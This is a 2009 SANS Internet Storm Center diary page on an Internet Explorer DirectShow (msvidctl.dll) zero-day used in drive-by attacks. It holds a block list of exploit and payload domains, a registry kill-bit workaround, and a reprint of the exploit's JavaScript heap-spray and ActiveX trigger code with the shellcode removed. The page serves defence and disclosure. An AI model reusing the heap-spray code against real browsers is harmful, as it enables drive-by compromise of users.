Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

IE 0day exploit domains (constantly updated)

Published: 2009-07-06
Last Updated: 2009-07-17 20:36:33 UTC
by Andre Ludwig (Version: 19)
7 comment(s)

This diary entry contains a list of domains that are exploiting the new IE-0day as well as secondary domains that are hosting potentially malicious binaries utilized in these attacks.  This list  has been produced as a combined effort of researchers, vendors, and volunteers. You can thank the groups below for their efforts and their willingness to share this information with the public.  This list is intended to serve as a quick way to provide protection against these attacks by identifying domains that are hosting these (and potentially other) exploits. This list is not formatted for any specific file format, it is up to you the reader to translate this date into the proper formatting that your environment requires.   

** In regards to IDS/IPS signatures, I would highly suggest looking for the malformed file vs trying to catch every permutation of the JS/Html seen.  Emerging threats has a signature that looks for the malformed file, it can be found in their main rules file.   2009493 - ET CURRENT_EVENTS Likely MSVIDCTL.dll exploit in transit (emerging.rules)


This diary entry will be updated frequently. The information provided has had varying degrees of verification performed on it. As such this information is provided as is.  There may very well be mistakes, mistakes that may result in legitimate sites being blocked if you choose to use this list as a block list.

 

Update: Removed some false positives (netvibes.com, blog.segu-info.com.ar, as well as a few IP addresses)

Update:    Removed www.dubro.com, which reported back that they cleaned up the malicious files.


Link on how to leverage DNS to blackhole/redirect queries.

http://www.malwaredomains.com/bhdns.html

Google Cache version of the above link

 

Massive thanks go to the following contributors:

Google
Symantec
Websense
CSIS
UCSB-Wepawet
IBM X-Force
Sunbelt Software
Telenor SOC
blog.zol.com.cn

 

List of exploit domains:

vip762.3322.org
3b3.org
www.27pay.com
www.hao-duo.com
dump.vicp.cc
64tianwang.com
webxue38.3322.org
556622.3322.org
jfg1.3322.org
df56y.3322.org
javazhu.3322.org
8dfgdsgh.3322.org
ceewe3w2.cn
js.tongji.linezing.com
h65uj.8866.org
45hrtt.8866.org
8oy4t.8866.org
www.mjbox.com
2wdqwdqw.cn
www.vbsjs.cn
cdew32dsw.cn
qvod.y2y2dfa.cn
kan31ni.cn
www.duiguide.us
gkiot.cn
www.carloon.cn
movie.wildmansai.com
www.7iai.cn
www.jazzhigh.com
www.netcode.com
6ik76.8866.org
76ith.8866.org
qd334t.8866.org
u5hjt.8866.org
vpsvip.com
x16ake8.6600.org
www.huimzhe.cn
www.hostts.cn
ucqh.6600.org
qitamove.kmip.net
news.85580000.com
guama.9966.org
dx123.9966.org
ds355.8866.org
dnf.17xj.cn
dasda11d.cn
d212dddw.cn
ckt5.cn
ccfsdee32.cn
aaa.6sys6.cn
9owe2211.cn
8man7.3322.org
6gerere3e.cn
66yttrre.cn
45hrtt.8866.org
tongji520.com
www.google-cdma.com
443ggr.8800.org
caonimabi.r154q.cn
ckt4.cn
fdg5.cn
guama.9966.org
home.xzx6.cn
q23r.cn
wf3gr.8800.org
www.ddlse.cn
www.gamezv.com
ads.v8dc.com
www.college360.cn
name81.8u60.8u.cn
wvg7.cn
ma.o524q.cn
laibuji.w528e.cn
girlfired.d821e.cn
www.haosecc1.com.cn
ok.swfover.info
4gameranking.com
blog20fc2.com
fwefr43.cn
bybyybyb.com
wr323e2e2.cn
www.tingcao.com
www.njpfw.com
qhjjyy.7766.org
www.google-cdn.com
www.fdsdffdfsf.cn
a444.dnf5.com
www.hi2i.cn
www.xsdg.cn
19743.yfyf.net
a22.7766.org
ad.sxserve.com
al0900.cn
allmuzz.ru
andrewkim.us
asfdasfasf.3322.org
assaaa.cn
b35.info
baidu.1cznn9.com.cn
bbs.ttrpg.net
bbssifu.cn
blog.foolmountain.com
blog20fc2.com
blogs.weedns.com
buffer-ad.qvodwf.com
buhsvarna.com
by.asnfhaksfhnasf15215.cn
caonimabi.r154q.cn
ce.ceceshishi888.cn
cgi35.plala.or.jp
code.5i28.com
compcycle.org
dex.blogsite.org
down.ezua.com
dshgfh43.9966.org
dubai.2ch.net
frumin.com
haatz.tistory.com
herhun2.cech.com.cn
hosts.dnfdf.com
hzone666.com
ihaveit777.info
jjgan.9966.org
jkjjkk.cn
kjkkkk.cn
li28.vicp.net
mmsifu.cn
nbl.com.tw
ngnggg.cn
nms.asjkghajkgh15.cn
nosternos.com
orerss.3322.org
qhmm.7766.org
qhwyt.8800.org
rfsb.xicp.net
rkrkrk.9966.org
secgov.xtycoon.org
serve.sxserve.com
shell.yfyf.net
sp5201314.w11.kj400.cn
srv.v-i-e-w.net
tag.gamersabc.com
theoschepens.nl
thewifihack.com
thtttt.cn
trughtsa.com
up.hmwz.net
usrvnu.ru
usrvzi.ru
ustrania.com
uuuyyy.3322.org
uyuuuu.cn
vip.ddoshacker.cn
vipguibin22.3322.org
ww.wytzt.cn
ww2.niupan.com
www.192idc.cn
www.78195.com
www.7hacker.com
www.92shaiya.cn
www.almasto.net
www.asialoverfinder.com
www.cvskr.com
www.debonairblog.com
www.dgcft.sems.gob.mx
www.dgfdffdfs.cn
www.dgzhangfeiyijue.com
www.dztv.cn
www.funoyun.com
www.geminicarsltd.com
www.glintsun.com
www.hanrss.com
www.info-yimg.com
www.iuwei.com
www.jy-hx.cn
www.l1il.cn
www.mflian.com.cn
www.mvilcd.net
www.mysnda.com
www.nicovedeo.com
www.normb.net
www.pasch.or.at
www.qinpengejia.cn
www.samkr.com
www.tech2tech.cn
www.usssakc.com
www.uygurie.com
www.veritech.co.kr
www.ws91.cn
www.xfgh.gov.cn
www.yahoo-mail.net.ru
www.yamaill.com
www.zbea.com
x166da.6600.org
xewyny.ru
ytvccc.cn
yuyyyu.cn
zxj.3video.cn
1ive.3322.org
3wjjyy.7766.org
5x.slyip.net
66aaaaaa.com
97wyqq.8866.org
17928.yfyf.net
99813.com
www.fireofliberty.org
tt99lov.cn
ee99zz.8866.org
syweb2.71w.org
ws234.cxhost.cn
6u6u8.cncsz.net
f1y.in




 

 


Second stage domains (binaries downloaded from these domains):

www.73yi.cn
w1.7777ee.com
w2.7777ee.com
w3.7777ee.com
w8.7777ee.com
w9.7777ee.com
milllk.com
haha999b.com
babi2009.com
haha888l.com
xin765.com


Ip's (no domain used in exploit page):

110.165.41.103
85.17.162.100
 

Keywords:
7 comment(s)

0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks

Published: 2009-07-06
Last Updated: 2009-07-07 14:08:53 UTC
by Stephen Hall (Version: 2)
8 comment(s)

A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available.

A valid work around for the attack vector is available which set's the kill bit on the vulnerable DLL.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400 

Details of the exploit are available on the CSIS web site, but are included below:


var appllaa='0';

var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

[SHELL CODE REMOVED]

var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

while(omybro.length<slackspace)

omybro+=omybro;

bZmybr=omybro.substring(0,slackspace);

shuishiMVP=omybro.substring(0,omybro.length-slackspace);

while(shuishiMVP.length+slackspace<0x30000)

shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;

memory=new Array();

for(x=0;x<300;x++)

memory[x]=shuishiMVP+dashell;

var myObject=document.createElement('object');

DivID.appendChild(myObject);

myObject.width='1';

myObject.height='1';

myObject.data='./logo.gif';

myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

 

 

UPDATE July 6, 2009 19:00 UTC

Microsoft have released an advisory for the exploit, it can be found here :
http://www.microsoft.com/technet/security/advisory/972890.mspx

In addition, they have published a number of blog entries to cover their user base:
http://blogs.technet.com/msrc/default.aspx
http://www.microsoft.com/technet/security/advisory/default.mspx
http://blogs.technet.com/srd/

 

 

Keywords: msVidCtl zero day
8 comment(s)
Diary Archives